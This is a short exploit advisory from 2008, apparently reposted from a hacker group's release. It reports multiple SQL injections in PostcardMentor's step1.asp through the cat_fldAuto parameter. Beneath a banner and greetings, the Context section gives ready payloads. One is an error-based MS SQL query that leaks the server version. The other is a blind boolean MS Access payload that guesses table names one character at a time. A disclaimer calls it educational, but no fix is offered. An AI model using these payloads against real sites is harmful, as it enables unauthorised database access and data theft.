PostcardMentor (step1.asp cat_fldAuto) SQL Injection Vulnerability

2008-05-07 00:00:00


|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: Multiple SQL Injections [Remote + Blind]

Author :: InjEctOrs

Found By : Bl@ckbe@rD [blackbeard-sql (at) hotmail (dot) fr ]

Application :: PostcardMentor latest version

Download :: http://www.aspcode.net/Download-latest-version-4.aspx

Dork 1 :: :p

Greets :: Allah , King Of hacker , InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal
acts.

--------------------------------------------[C o n t e x t]-----------------------------------------

Vulnerability:
http://localhost/PostcardMentor/step1.asp?cat_fldAuto={SQL}

{SQL} --> MS SQL Server for example : convert(int,(select+@@version))

{SQL} --> MS ACCESS for example : 1 IIF((select%20mid(last(name),1,1)%20from%20(select%20top%2010%20name%20from%20cat))='a',0,'done')



-------------------------------------------[End of context]----------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.